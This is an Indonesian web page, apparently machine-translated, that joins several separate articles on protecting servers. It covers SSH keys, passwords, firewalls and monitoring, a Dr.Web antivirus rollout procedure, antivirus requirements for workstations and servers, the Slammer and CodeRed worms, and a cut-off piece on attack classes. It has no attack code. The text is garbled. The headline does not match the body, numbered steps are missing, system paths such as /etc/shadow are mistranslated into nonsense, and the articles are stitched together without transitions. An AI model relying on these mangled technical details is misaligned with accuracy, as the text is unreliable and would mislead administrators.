rumah » Bernada tunggal » Pembuatan server perlindungan anti-virus. Parameter ini memungkinkan Anda untuk menentukan grup komputer dan domain yang akan dipindai. Masalah dengan penjadwalan pengguna

Pembuatan server perlindungan anti-virus. Parameter ini memungkinkan Anda untuk menentukan grup komputer dan domain yang akan dipindai. Masalah dengan penjadwalan pengguna

Tidak mungkin untuk melindungi server dari akses eksternal sekali dan untuk semua, karena setiap hari kerentanan baru ditemukan dan cara-cara baru untuk meretas server muncul. Kami akan berbicara tentang melindungi server dari akses tidak sah di artikel ini.

Server perusahaan mana pun cepat atau lambat dapat menjadi target peretasan atau serangan virus. Biasanya, akibat dari serangan tersebut adalah kehilangan data, reputasi atau kerusakan finansial, sehingga keamanan server harus dipertimbangkan terlebih dahulu.

Harus dipahami bahwa perlindungan terhadap peretasan server adalah serangkaian tindakan, termasuk tindakan yang menyiratkan pemantauan terus-menerus terhadap operasi server dan bekerja untuk meningkatkan perlindungan. Tidak mungkin untuk melindungi server dari akses eksternal sekali dan untuk semua, karena setiap hari kerentanan baru ditemukan dan cara-cara baru untuk meretas server muncul.

Kami akan berbicara tentang melindungi server dari akses tidak sah di artikel ini.

Cara dan metode melindungi server dari akses yang tidak sah

Perlindungan server fisik

Perlindungan fisik. Diinginkan bahwa server terletak di pusat data yang aman, tempat tertutup dan dijaga, orang luar tidak boleh memiliki akses ke server.

Siapkan otentikasi SSH

Saat mengonfigurasi akses ke server, gunakan otentikasi kunci SSH alih-alih kata sandi, karena kunci seperti itu jauh lebih sulit, dan terkadang tidak mungkin diretas menggunakan enumerasi opsi.

Jika Anda merasa masih memerlukan kata sandi, pastikan untuk membatasi jumlah upaya untuk memasukkannya.

Perhatikan jika Anda melihat pesan seperti ini saat Anda masuk:

Login gagal terakhir: Sel 28 Sep 12:42:35 MSK 2017 dari 52.15.194.10 di ssh: notty
Ada 8243 upaya login yang gagal sejak yang terakhir Login Berhasil.

Ini mungkin menunjukkan bahwa seseorang mencoba meretas server Anda. Dalam hal ini, untuk mengonfigurasi keamanan server, mengubah port SSH, membatasi daftar IP yang memungkinkan akses ke server, atau menginstal perangkat lunak yang secara otomatis memblokir aktivitas yang terlalu sering dan mencurigakan.

Instal pembaruan terbaru secara teratur

Untuk memastikan perlindungan server, instal patch dan pembaruan terbaru untuk perangkat lunak server yang Anda gunakan - sistem operasi, hypervisor, server database tepat waktu.

Disarankan untuk memeriksa patch baru, pembaruan, dan bug/kerentanan yang dilaporkan setiap hari untuk mencegah serangan yang mengeksploitasi kerentanan zero-day. Untuk melakukan ini, berlangganan berita dari perusahaan pengembangan perangkat lunak, ikuti halamannya di jejaring sosial.

Lindungi kata sandi

Sampai saat ini, salah satu cara paling umum untuk mendapatkan akses ke server adalah dengan meretas kata sandi server. Oleh karena itu, patuhi rekomendasi yang terkenal, namun tetap relevan, agar tidak membiarkan server tidak terlindungi:

  • tidak menggunakan password yang mudah ditebak, seperti nama perusahaan;
  • jika Anda masih menggunakan kata sandi default untuk konsol admin, segera ubah;
  • kata sandi untuk layanan yang berbeda harus berbeda;
  • jika Anda perlu mentransfer kata sandi kepada seseorang, jangan pernah mengirim alamat IP, nama pengguna, dan kata sandi dalam surat atau pesan yang sama di messenger;
  • Anda dapat mengatur Verifikasi 2 Langkah untuk masuk ke akun administrator.

Firewall

  • Pastikan server ada di sana, dikonfigurasi dan berjalan sepanjang waktu.
  • Lindungi lalu lintas masuk dan keluar.
  • Pantau port mana yang terbuka dan untuk tujuan apa, jangan buka apa pun yang tidak perlu untuk mengurangi jumlah kemungkinan kerentanan untuk meretas server.

Secara khusus, firewall sangat membantu dalam melindungi server dari serangan ddos, karena Anda dapat dengan cepat membuat aturan firewall yang melarang dan memasukkan ke dalamnya alamat IP asal serangan, atau memblokir akses ke aplikasi tertentu menggunakan protokol tertentu.

Pemantauan dan Deteksi Intrusi

  • Batasi perangkat lunak dan layanan yang berjalan di server Anda. Periksa secara berkala semua yang Anda jalankan, dan jika Anda menemukan proses yang tidak dikenal, segera hapus dan mulailah memeriksa virus.
  • Periksa secara berkala untuk tanda-tanda gangguan. Akun pengguna baru yang tidak Anda buat, pindahkan, atau hapus file dapat mengindikasikan pelanggaran /etc/syslog.conf, file yang dihapus / dll / bayangan dan / etc / sandi.
  • Pantau kinerja server Anda, awasi kecepatan dan bandwidth normalnya, sehingga Anda dapat melihat penyimpangan, misalnya, ketika beban pada server menjadi jauh lebih tinggi dari biasanya.

Menggunakan Enkripsi VPN dan SSL / TLS

Jika akses jarak jauh ke server diperlukan, itu hanya boleh diizinkan dari alamat IP tertentu dan harus dilakukan melalui VPN.

Langkah selanjutnya dalam memastikan keamanan adalah dengan menyiapkan SSL, yang tidak hanya akan mengenkripsi data, tetapi juga memverifikasi identitas peserta lain dalam infrastruktur jaringan dengan mengeluarkan sertifikat yang sesuai kepada mereka.

Pemeriksaan keamanan server

Sebaiknya periksa keamanan server secara mandiri menggunakan metode pentest, mis. simulasi serangan untuk menemukan potensi kerentanan dan menghilangkannya tepat waktu. Dianjurkan untuk melibatkan spesialis keamanan informasi dalam hal ini, namun, beberapa tes dapat dilakukan secara independen, menggunakan program untuk meretas server.

Apa lagi yang mengancam server selain peretasan

Server dapat gagal karena sejumlah alasan selain peretasan. Misalnya, itu bisa berupa infeksi malware atau hanya kerusakan fisik salah satu komponen.

Oleh karena itu, langkah-langkah untuk melindungi server harus mencakup:

  • Instalasi dan pembaruan program untuk melindungi server - antivirus.
  • Salinan data terenkripsi reguler, setidaknya sekali seminggu, karena, menurut statistik, hard drive server berada di tempat pertama dalam hal tingkat kegagalan. Pastikan cadangan disimpan di lingkungan yang aman secara fisik.
  • Menyediakan catu daya tanpa gangguan ke ruang server.
  • Profilaksis fisik server yang tepat waktu, termasuk membersihkannya dari debu dan mengganti pasta termal.

Pengalaman spesialis Integrus memberi tahu kita bahwa perlindungan terbaik terhadap ancaman tersebut adalah penerapan praktik terbaik di bidang sistem perlindungan server.

Untuk memastikan keamanan server pelanggan kami, kami menggunakan kombinasi alat: firewall, antivirus, teknologi manajemen keamanan / acara (SIM / SEM), teknologi deteksi / perlindungan intrusi (IDS / IPS), teknologi analisis perilaku jaringan (NBA) , tentu saja, pemeliharaan preventif rutin.server dan pengaturan ruang server turnkey yang aman. Ini memungkinkan Anda meminimalkan risiko peretasan atau kegagalan server karena alasan lain.

Kami siap untuk mengaudit keamanan server perusahaan Anda, berkonsultasi dengan spesialis, melakukan semua jenis pekerjaan dalam menyiapkan perlindungan peralatan server.

VYACHESLAV MEDVEDEV, Analis Terkemuka, Departemen Pengembangan, Web Dokter

Prosedur penerapan perlindungan anti-virus

Cukup sering, pada saat pemilihan (dan kadang-kadang bahkan pada saat pembelian), pelanggan tertarik pada rekomendasi tentang cara menerapkan perlindungan anti-virus atau langkah-langkah untuk mengganti produk yang digunakan sebelumnya. Artikel ini akan membahas cara mengatur proses dengan benar

Sangat poin penting... Sayangnya, dalam banyak kasus, kontak penjualan pergi dengan manajer, dan pengujian diteruskan ke administrator sistem. Hasilnya seringkali laporan yang mencengangkan bahkan vendor. Nama produk yang salah, versi kuno, indikasi kurangnya fungsionalitas yang sebenarnya telah tersedia selama beberapa tahun, dll. Semuanya perlu diperbaiki, tetapi kereta telah pergi, dan kehormatan perusahaan mencegah mereka untuk mengakui bahwa spesialis mereka tidak memiliki kualifikasi yang diperlukan.

1) Mempelajari kemampuan solusi selama pengujian instalasi sistem perlindungan untuk stasiun kerja, server file, server surat, dan server manajemen perlindungan anti-virus. Ada juga beberapa jebakan di sini. Anehnya, tetapi cukup sering pelanggan tidak tahu apa yang mereka butuhkan. Dan akan baik-baik saja jika pertanyaannya tentang fungsionalitas, itu bisa dimengerti. Seringkali, bahkan pertanyaan tentang daftar perangkat lunak yang digunakan dalam organisasi menimbulkan kesulitan, yang, pada gilirannya, tidak memungkinkan kami untuk membuat proposal pada daftar perangkat lunak yang disediakan.

Masalah kedua terkait dengan fakta bahwa administrator sistem (yang biasanya melakukan pengujian) sangat mengetahui produk yang digunakan, tetapi (tentu saja) tidak mengetahui kelebihan dan kekurangan produk yang diuji (tetapi pada saat yang sama). saat yang sama mereka berharap akan ada jebakan dalam hal membeli produk) ... Oleh karena itu, disarankan untuk setuju dengan calon pemasok tentang daftar prosedur yang akan diterapkan menggunakan produk dan permintaan yang dibeli petunjuk langkah demi langkah untuk fungsi ini atau, jika tidak ada instruksi tersebut, instruksi pengujian. Ini akan menghindari membuang waktu untuk pertanyaan yang tidak jelas.

2) Memeriksa pengoperasian kebijakan keamanan yang dibentuk sesuai dengan kebijakan keamanan informasi perusahaan. Karena kenyataan bahwa setiap produk mengimplementasikan fungsionalitas yang diperlukan untuk perusahaan dengan caranya sendiri (misalnya, memungkinkan atau tidak mengizinkan penggunaan browser sewenang-wenang untuk kontrol), baik daftar langkah-langkah prosedur dan durasinya dapat berbeda. Di waktu normal, ini tidak kritis, tetapi jika terjadi insiden viral, setiap detik bisa sangat berharga.

3) Memeriksa kompatibilitas software Dr.Web dan software yang digunakan di perusahaan. Ketidakcocokan perangkat lunak jarang terjadi, tetapi kemungkinan ini tidak dapat diabaikan. Oleh karena itu, langkah ini juga diperlukan selama pengujian produk yang diusulkan.

4) Klarifikasi rencana penerapan software Dr.Web berdasarkan hasil pengujian instalasi sesuai dengan struktur jaringan perusahaan perusahaan dan jadwal kerja karyawan.

a) Klarifikasi waktu penerapan komponen perangkat lunak Dr.Web dalam kondisi jaringan lokal perusahaan. Cukup sering selama proses pengadaan, sebuah pertanyaan diajukan tentang waktu yang dibutuhkan untuk menyebarkan. Praktik menunjukkan bahwa dalam sebagian besar kasus, durasi penerapan hanya bergantung pada spesialis perusahaan. Menurut praktik yang sama, cukup hari libur untuk transfer lengkap perusahaan dari satu sistem perlindungan ke sistem perlindungan lainnya dengan jumlah stasiun mendekati seribu.

b) Memilih jenis penyebaran perangkat lunak Dr.Web di stasiun lokal dan server file (kebijakan AD, meluncurkan distribusi secara lokal, memindai jaringan ke stasiun yang tidak dilindungi, dll.). Tergantung pada lebar pita jaringan, Active Directory, kantor cabang dan persyaratan perlindungan pekerja jarak jauh, perusahaan dapat memilih dari berbagai opsi penyebaran (lihat Gambar 1).

c) Pilihan urutan dan waktu penerapan perangkat lunak sesuai dengan struktur jaringan perusahaan perusahaan dan jadwal karyawan. Sangat penting untuk memastikan kelangsungan bisnis selama penerapan keamanan. Menurut hukum kekejaman, pada saat kurangnya perlindungan itulah infeksi yang paling mengerikan dapat terjadi.

Contoh skema penyebaran instalasi anti-virus di jaringan perusahaan ditunjukkan pada Gambar. 2.

5) Pelatihan administrator keamanan perusahaan dalam teknik bekerja dengan perangkat lunak.

6) Pengembangan prosedur terkait penghapusan perangkat lunak anti-virus yang digunakan dan instalasi perangkat lunak.

Anehnya, penghapusan antivirus bekas menimbulkan banyak pertanyaan. Pelanggan memerlukan antivirus yang diinstal untuk menghapus antivirus yang digunakan sebelumnya. Sayangnya, dalam banyak kasus ini tidak mungkin. Sistem pertahanan diri antivirus, yang dirancang untuk melawan penjahat dunia maya, mencegah siapa pun menghapusnya.

a) Pengembangan langkah-langkah perlindungan untuk periode ketika perangkat lunak anti-virus tidak tersedia di elemen jaringan perusahaan. Atau, untuk periode ini, Anda dapat menerapkan pemindaian semua lalu lintas masuk di gateway dan melarang penggunaan media yang dapat dipindahkan.

7) Memeriksa jaringan lokal (stasiun dan server yang dilindungi) untuk ketersediaan layanan yang diperlukan untuk menyebarkan perangkat lunak di jaringan perusahaan. Jika perlu, sesuaikan aturan firewall yang digunakan di jaringan perusahaan. Poin ini juga sulit. Anehnya, tetapi tidak ada produk yang dapat mengembun dari udara tipis di komputer yang dilindungi. Bergantung pada jenis penerapan yang dipilih, Anda perlu membuka port tertentu, mengaktifkan layanan yang diperlukan, dll.

Terkadang pembatasan port dan layanan yang digunakan oleh perusahaan menjadi dasar untuk memilih jenis penyebaran.

8) Persetujuan jadwal penyebaran di jaringan perusahaan. Membawa jadwal kepada karyawan perusahaan dalam hal perhatian mereka. Karyawan perusahaan harus mengetahui (sejauh yang mereka ketahui) tentang acara-acara yang diadakan di perusahaan. Dalam rangka kegiatan yang sedang berlangsung, spesialis perusahaan harus dapat dengan cepat mengakses komputer dan tempat yang diperlukan. Seringkali hal ini tidak mungkin dilakukan tanpa persetujuan dari manajer terkait.

Mengganti perangkat lunak antivirus di jaringan perusahaan

1) Persiapan perangkat lunak yang diperlukan tergantung pada jenis penerapan yang dipilih. Sangat jelas bahwa untuk OS yang berbeda, jenis aplikasi, dll. berbagai distribusi yang digunakan.

  • Pemasangan server jaringan hierarkis, node cluster, dan, jika perlu, database yang diperlukan (lihat Gambar 3).

  • Penerapan sistem redundansi untuk server Dr.Web (lihat Gambar 4). Server apa pun bisa macet. Tetapi jatuhnya server anti-virus menyebabkan penghentian pembaruan ke stasiun yang dilindungi. Oleh karena itu, cadangan server anti-virus sangat penting.

  • Mengonfigurasi grup dan kebijakan.
  • Jika perlu, tetapkan administrator individu ke grup pengguna dan batasi hak administrator ini sesuai dengan kebijakan perusahaan.
  • Melakukan tindakan yang diperlukan tergantung pada kebijakan penerapan yang dipilih. Misalnya, pengaturan AD.

2) Memindai jaringan perusahaan dengan utilitas jaringan Dr.Web CureNet! untuk kehadiran malware yang sebelumnya tidak dikenal (lihat gambar 5). Sayangnya, tidak ada jaminan bahwa PC yang ingin Anda instal bebas dari malware. Secara alami, penginstalan pada mesin yang terinfeksi dimungkinkan, tetapi selalu ada kemungkinan bahwa program jahat yang sedang berjalan memiliki fungsi yang ditujukan untuk melawan penginstalan antivirus. Paling tidak, ini akan melumpuhkan proses penyebaran perlindungan dari jadwal, jadi lebih baik untuk memeriksa keberadaan malware sesaat sebelum instalasi.

  • Pemasangan sistem proteksi untuk workstation dan file server sesuai dengan pengaturan yang dilakukan pada langkah sebelumnya.
  • Pemasangan sistem perlindungan untuk server surat, gateway Internet.

5) Pengoperasian perangkat lunak selama periode pengujian.

6) Melakukan update software sesuai dengan kebijakan perusahaan.

7) Melakukan pemeriksaan berkala terhadap stasiun kerja, file, dan server surat yang dilindungi (lihat gambar 7).

8) Kontrol tindakan perangkat lunak pada pengaruh pengujian malware.

9) Memeriksa prosedur untuk berinteraksi dengan dukungan teknis.

Secara umum, tidak ada yang rumit jika Anda mempersiapkan tahap apa pun sebelumnya.

Semoga berhasil dengan penerapan Anda!


Dalam kontak dengan

Berdasarkan alasan dan contoh di atas, kami dapat merumuskan persyaratan dasar antivirus untuk workstation. Jelas bahwa persyaratan ini akan berbeda untuk workstation dari kelas yang berbeda.

Persyaratan antivirus untuk workstation Windows

Seperti sebelumnya, persyaratan akan dibagi menjadi beberapa kategori:

  1. Persyaratan Umum- keandalan, kinerja, kemudahan penggunaan, murahnya - tidak ada gunanya mengulangi diri Anda sekali lagi
  2. Persyaratan utama- sebagai konsekuensi dari tugas utama:
    • Memindai semua file pada drive lokal yang sedang diakses - untuk membaca, menulis, untuk diluncurkan - untuk mengidentifikasi dan menetralisir virus komputer
    • Memeriksa drive yang dapat dilepas dan jaringan
    • Pemeriksaan memori
    • Memeriksa surat masuk dan surat keluar dari virus, baik pesan itu sendiri maupun lampirannya harus diperiksa
    • Memeriksa skrip dan elemen aktif lainnya dari halaman web
    • Memeriksa makro dalam dokumen Microsoft Office dan file aplikasi lain
    • Memindai file gabungan - arsip, arsip yang mengekstraksi sendiri, file yang dapat dieksekusi yang dikemas, database email, file format surat, wadah OLE
    • Kemungkinan untuk memilih berbagai tindakan pada file yang terinfeksi, biasanya:
      • memblokir (saat memeriksa secara real time)
      • logging (pemindaian sesuai permintaan)
      • penghapusan
      • karantina
      • perlakuan
      • meminta tindakan dari pengguna
    • Perawatan file yang terinfeksi
    • Membersihkan file yang terinfeksi dalam arsip
    • Diinginkan - deteksi program yang mungkin tidak diinginkan (modul adware dan spyware, alat peretas, dll.)
  3. Persyaratan manajemen
    • GUI lokal
    • Kemampuan manajemen jarak jauh dan terpusat (versi perusahaan)
    • Kemampuan untuk menjadwalkan peluncuran tugas pemindaian dan pembaruan
    • Kemampuan untuk meluncurkan tugas apa pun atau melakukan tindakan apa pun sesuai permintaan (secara manual)
    • Kemampuan untuk membatasi tindakan pengguna yang tidak memiliki hak terkait dengan kompleks anti-virus
  4. Persyaratan Peningkatan
    • Dukungan untuk berbagai sumber pembaruan, standar:
      • Sumber daya HTTP atau FTP
      • Folder lokal atau jaringan
      • Sistem pembaruan terpusat (dalam versi perusahaan)
    • Kemampuan untuk memperbarui basis data anti-virus, mesin anti-virus, dan modul aplikasi
    • Kemampuan untuk melakukan pembaruan secara manual sesuai permintaan atau secara otomatis sesuai jadwal
    • Kemampuan untuk memutar kembali pembaruan basis data anti-virus
  5. Persyaratan diagnostik
    • Memberi tahu pengguna lokal tentang peristiwa penting - deteksi virus, perubahan status antivirus, dll.
    • Menyimpan log dari antivirus dan / atau tugas individu
    • Pemberitahuan administrator keamanan anti-virus (dalam versi perusahaan)
Persyaratan antivirus untuk workstation Linux / Unix
  1. Persyaratan Umum- praktis tidak berubah: keandalan, kinerja, biaya rendah. Kegunaan dalam sistem Unix secara tradisional dievaluasi menurut kriteria yang sedikit berbeda dari pada sistem Windows, meskipun keadaan ini mulai berubah secara bertahap menuju penyatuan persyaratan
  2. Persyaratan utama- berdasarkan tujuannya:
    • Pemindaian sesuai permintaan dari file dan direktori arbitrer untuk virus
    • Diinginkan, tetapi tidak kritis, untuk memindai direktori tertentu secara real time saat mengakses file. Jika fungsionalitas seperti itu benar-benar diperlukan, maka kita tidak berbicara banyak tentang workstation tetapi tentang server - dalam sistem Unix tidak ada perbedaan yang jelas di antara mereka.
    • Deteksi virus dalam objek gabungan - arsip, arsip yang mengekstraksi sendiri, modul yang dapat dieksekusi yang dikemas, basis data pos, format surat, wadah OLE - tidak terbatas pada format yang umum di lingkungan Unix
    • Kemungkinan untuk memilih tindakan setelah mendeteksi file yang terinfeksi, biasanya:
      • menghapus
      • pindah atau ganti nama
      • merawat
      • menulis informasi ke laporan
      • meminta tindakan pengguna (saat memeriksa permintaan)
    • Perawatan file yang terinfeksi
    • Diinginkan - kemungkinan perawatan di arsip
  3. Persyaratan manajemen
    • Manajemen lokal dengan mengedit file konfigurasi
    • Diinginkan - remote control melalui antarmuka web
    • Kemampuan untuk menjadwalkan peluncuran tugas dan pelaksanaan tindakan
    • Kemampuan untuk melakukan tugas dan tindakan secara manual
  4. Persyaratan diagnostik
    • Menyimpan log kerja
    • Pemberitahuan Administrator Keamanan Anti-Virus

Perlindungan server

Umumnya perlindungan antivirus server tidak berbeda dari perlindungan workstation seperti dari perlindungan gateway, misalnya. Ancaman utama dan teknologi untuk melawannya tetap sama - hanya aksennya yang digeser.

Server jaringan, seperti halnya workstation, secara alami dibagi menjadi beberapa kelas, sesuai dengan sistem operasi yang digunakan:

  • Server Windows
  • Server Netware Novell
  • Server Unix

Prinsip pembagian adalah karena karakteristik ancaman virus dari berbagai sistem operasi dan, sebagai akibatnya, pilihan yang berbeda dalam menentukan tugas utama anti-virus.

Dalam hal produk perlindungan server, tidak ada pembagian menjadi produk pribadi dan jaringan - semua produk adalah jaringan (korporat). Banyak produsen bahkan tidak memiliki divisi produk perusahaan menjadi yang ditujukan untuk workstation dan server file - mereka memiliki satu produk.

Ancaman dan penanggulangan khusus

Semua ancaman khusus server tidak begitu terkait dengan fitur sistem operasi server seperti halnya penggunaan perangkat lunak rentan yang khas untuk server.

Server Microsoft Windows

Untuk server Windows, semua ancaman yang sama relevan dengan workstation di bawah Windows NT / 2000 / XP. Satu-satunya perbedaan adalah cara utama mengoperasikan server, yang menghasilkan sejumlah serangan tambahan yang tidak biasa terjadi pada workstation.

Jadi, pengguna jarang bekerja langsung di belakang server Windows, yang berarti klien email dan aplikasi kantor di server biasanya tidak digunakan. Akibatnya, persyaratan untuk perlindungan email di tingkat klien email dan sarana tambahan untuk mendeteksi virus makro kurang diminati dalam kasus server Windows.

Contoh... Tidak seperti Kaspersky Anti-Virus for Windows Workstations, Kaspersky Anti-Virus for Windows File Server tidak memiliki modul untuk analisis perilaku makro yang dijalankan saat bekerja dengan dokumen Microsoft Office dan modul untuk memindai surat masuk dan keluar. Ini tidak berarti bahwa produk tidak memiliki perlindungan terhadap virus makro dan worm email - seperti yang telah disebutkan, pada akhirnya, semua file yang dibuka diperiksa oleh modul perlindungan sistem file waktu nyata - hanya saja spesifikasi operasi server tidak memerlukan tindakan perlindungan tambahan, seperti halnya dengan stasiun pekerja.

Di sisi lain, layanan seperti Microsoft SQL Server dan Microsoft IIS dapat digunakan di server Windows lebih sering daripada di workstation. Seperti sistem operasi itu sendiri yang dibuat oleh Microsoft (dan bukan hanya Microsoft), layanan ini dapat mengandung kerentanan, yang digunakan oleh pembuat virus berkali-kali pada masanya.

Contoh... Pada tahun 2003, worm Net-Worm .Win32.Slammer muncul dan secara harfiah menyapu Internet, yang mengeksploitasi kerentanan di Microsoft SQL Server 2000. Slammer tidak menyimpan filenya ke disk, tetapi dieksekusi langsung di ruang alamat SQL Server aplikasi. Worm kemudian menyerang alamat IP acak di jaringan dalam lingkaran tanpa akhir, mencoba mengeksploitasi kerentanan yang sama untuk menyusup. Sebagai akibat dari aktivitas worm, server dan saluran komunikasi Internet menjadi kelebihan beban sehingga seluruh segmen jaringan tidak dapat diakses. Korea Selatan sangat terpengaruh oleh epidemi tersebut. Perlu dicatat bahwa worm tidak melakukan tindakan lain selain reproduksi.

Contoh... Sebelumnya, pada tahun 2001, kerentanan di Microsoft IIS 5.0 dieksploitasi untuk disebarkan oleh cacing Net-Worm .Win32. Kode Merah .a. Konsekuensi dari epidemi tidak begitu mengesankan seperti dalam kasus worm Slammer, tetapi dengan bantuan komputer yang terinfeksi CodeRed .a, upaya DDoS berhasil dilakukan di situs web Gedung Putih AS (www.whitehouse.gov). CodeRed .a juga tidak menyimpan file ke disk server yang terinfeksi.

Keunikan kedua worm adalah bahwa modul untuk memeriksa sistem file (setidaknya berdasarkan permintaan, setidaknya pada akses) tidak berdaya melawan mereka. Cacing ini tidak menyimpan salinannya ke disk dan tidak menunjukkan keberadaannya di sistem sama sekali, kecuali untuk peningkatan aktivitas jaringan. Sampai saat ini, rekomendasi utama untuk perlindungan adalah pemasangan patch yang tepat waktu pada sistem operasi dan perangkat lunak yang digunakan. Pendekatan lain adalah mengonfigurasi firewall sehingga port yang digunakan oleh layanan rentan tidak dapat diakses dari luar - persyaratan yang wajar dalam kasus perlindungan Slammer, tetapi tidak dapat diterima untuk perlindungan CodeRed.

Cacing yang menyerang layanan sistem operasi yang sudah rentan secara langsung, seperti Lovesan, Sasser, Mytob, dll., Tetap relevan untuk server Windows. Perlindungan terhadap mereka harus dipastikan dengan tindakan komprehensif - menggunakan firewall, memasang tambalan, menerapkan verifikasi pada akses ( worm yang disebutkan jika serangan berhasil, simpan file mereka ke hard drive Anda).

Mengingat sifat serangannya, kita dapat menyimpulkan bahwa cara utama untuk melindungi server Windows adalah: modul pemindaian file saat diakses, modul pemindaian file sesuai permintaan, modul pemeriksaan skrip, dan teknologi utama adalah analisis tanda tangan dan heuristik. (serta perilaku - dalam modul pemeriksaan skrip) ...

Server Netware Novell

Tidak ada virus khusus yang mampu menginfeksi Novell Netware. Namun, ada beberapa Trojan yang mencuri hak akses ke server Novell, tetapi mereka masih dirancang untuk berjalan di Windows.

Oleh karena itu, antivirus untuk server Novell Netware sebenarnya tidak dirancang untuk melindungi server ini. Lalu, apa saja fungsinya? Dalam mencegah penyebaran virus. Sebagian besar server Novell Netware digunakan sebagai server file; Pengguna Windows dapat menyimpan file mereka di server tersebut atau menjalankan program yang terletak di volume Novell Netware. Untuk mencegah virus memasuki sumber daya bersama dari server Novell, atau meluncurkan / membaca virus dari sumber daya tersebut, diperlukan antivirus.

Oleh karena itu, alat utama yang digunakan dalam antivirus untuk Novell Netware adalah pemindaian saat diakses dan pemindaian saat diminta.

Di antara teknologi khusus yang digunakan dalam antivirus untuk Novell Netware, perlu diperhatikan pemblokiran stasiun dan / atau pengguna yang menulis program jahat ke server.

Server Unix

Hal yang sama dapat dikatakan tentang server Unix seperti tentang server Novell Netware. Antivirus untuk server Unix tidak memecahkan begitu banyak masalah melindungi server itu sendiri dari infeksi, melainkan masalah mencegah penyebaran virus melalui server. Untuk ini, semua dua alat dasar yang sama digunakan:

  • Pemindaian file sesuai permintaan
  • Memeriksa file pada akses

Contoh... Kaspersky Anti-Virus for Unix / Linux File Server menyertakan modul pemindaian saat diakses, sedangkan Kaspersky Anti-Virus for Linux Workstations tidak memiliki modul seperti itu. Ini karena berbagai fungsi workstation dan server Linux - dalam jaringan yang dibangun secara eksklusif (atau sebagian besar) di stasiun Linux, praktis tidak ada risiko infeksi virus, dan oleh karena itu tidak ada kebutuhan mendesak untuk modul yang mengontrol semua operasi file . Sebaliknya, jika komputer Linux secara aktif digunakan untuk menyimpan dan mentransfer file (terutama di jaringan Windows), maka itu sebenarnya adalah server dan memerlukan kontrol file yang konstan.

Banyak worm terkenal di Linux digunakan untuk menyebarkan kerentanan bukan di sistem operasi itu sendiri, tetapi di sistem dan perangkat lunak aplikasi - di server ftp wu-ftpd, di server web Apache. Jelas bahwa aplikasi semacam itu lebih sering digunakan di server daripada di stasiun kerja, yang merupakan argumen tambahan yang mendukung langkah-langkah keamanan server yang ditingkatkan.

Tidak seperti server Novell, di mana dukungan untuk jaringan Microsoft terintegrasi, server Unix tidak dikonfigurasi secara default untuk mentransfer file melalui SMB / CIFS. Untuk tujuan ini, paket perangkat lunak khusus digunakan - Samba, yang memungkinkan Anda membuat sumber daya bersama yang kompatibel dengan jaringan Microsoft.

Jika file dipertukarkan hanya menggunakan protokol SMB / CIFS, maka jelas tidak masuk akal untuk mengontrol semua operasi file, cukup untuk memeriksa hanya file yang ditransfer menggunakan server Samba.

Contoh... Lini produk Kaspersky Lab mencakup solusi khusus - Kaspersky Anti-Virus for Samba Server, yang dirancang khusus untuk melindungi folder bersama yang dibuat di server Unix menggunakan perangkat lunak Samba. Produk ini tidak menyertakan modul yang mengontrol operasi file; sebagai gantinya, ia menggunakan filter bawaan Samba yang memotong semua file yang ditransfer.


Pada artikel ini, saya ingin mengumpulkan beberapa jenis serangan pada server dan cara melindungi server dari peretas. Banyak buku dan artikel telah ditulis tentang topik keamanan. Fokus artikel ini adalah pada kesalahan dasar administrator dan solusi untuk menghilangkannya. Setelah membaca artikel ini dan memeriksa servernya sendiri, administrator juga tidak akan bisa tidur nyenyak, dia hanya bisa mengatakan saya lulus "kandidat minimum".

Ingat administrator tiga peribahasa,
Tidak! lebih baik cetak dan gantung di tempat kerja Anda di depan mata Anda:
"Keamanan adalah sebuah proses",
"Ketika admin tidak ada hubungannya, dia berurusan dengan keamanan",
"Keamanan ditentukan oleh tautan terlemah"
Artikel ini difokuskan pada admin * nix + Apache + PHP + Perl + (MySQL | PostgreSQL) dan melindungi server dari serangan jarak jauh, untuk admin lain artikel ini, saya harap, akan menjadi bahan pemikiran.
Dalam buku yang berbeda ada klasifikasi yang berbeda dari serangan hacker, saya akan memperkenalkan divisi saya menjadi dua kelas bersyarat dari SEMUA serangan, ungroup mereka:

  • Menyerang layanan yang rentan dan dapat diakses melalui Internet

Untuk memahami divisi saya, bayangkan ada skrip fiksi yang menyerang Apache dari jarak jauh pada port 80 dan sebagai akibat dari serangan itu Apache menghentikan pekerjaannya dan Anda dibiarkan tanpa situs Anda, karena tidak ada orang yang memberikan halaman web. Sendmail server email Anda dikirim 1000 karakter sebagai parameter untuk VRFY, bukan nama pengguna yang pendek, sendmail tidak mengharapkan perkembangan ini dan ditutup, meninggalkan Anda tanpa email. Arti umum dari serangan kelas bersyarat ini adalah bahwa beberapa kerentanan aplikasi dieksploitasi. Dan ada tiga cara -

  • jalur 1) aplikasi akan macet dan layanan tidak akan tersedia, situasi DoS;
  • jalur 2) aplikasi akan mulai mengambil sumber daya dan, setelah menghabiskannya, akan melakukan DoS;
  • jalur 3) aplikasi akan diberi kode shell dan kode penyerang akan dieksekusi;

Ini semua adalah serangan terhadap layanan (hal.1) dan diperlakukan hanya dalam satu cara: administrator dengan cepat belajar dari pengembang tentang adanya kerentanan dan memperbarui program ini.

Serangan titik 2 adalah ketika layanan dinamis yang diimplementasikan dalam beberapa bahasa pemrograman memungkinkan menerima parameter dan, tanpa memeriksanya, mengeksekusinya. Misalnya, menggunakan browser, penyerang, merayapi situs yang dijalankan oleh Apache, mencari kerentanan di situs itu sendiri dan mengeksploitasinya untuk mendapatkan apa yang diinginkannya. Ditulis dalam Tcl, bot untuk memoderasi saluran server IRC menerima permintaan dari pengguna (jumlah anekdot baru, tanggal hari untuk menampilkan cuaca) dan peretas, menciptakan kembali pekerjaan kode program bot (rekayasa balik ), membuat permintaan yang tidak diperhitungkan oleh pembuat bot.

Tanyakan bagaimana? maka anda pasti membutuhkan artikel ini. Dengan satu atau lain cara, semuanya akan dijelaskan di bawah ini.

Menyerang layanan yang rentan dan server itu sendiri

Bagian ini mencakup semua serangan yang mengenai sistem dan layanan. Seringkali serangan seperti itu dimungkinkan dari kesalahan dalam implementasi program, seperti buffer overflows. Singkatnya, terlihat seperti ini, katakanlah di server FTP yang ditulis dengan buruk ada array (buffer) untuk nama pengguna untuk sejumlah karakter tertentu (misalnya, 10), dan server FTP semacam itu menerima 100 karakter dari sakit -wisher, jika situasi seperti itu tidak dalam kode FTP server diperiksa, terjadi buffer overflow.

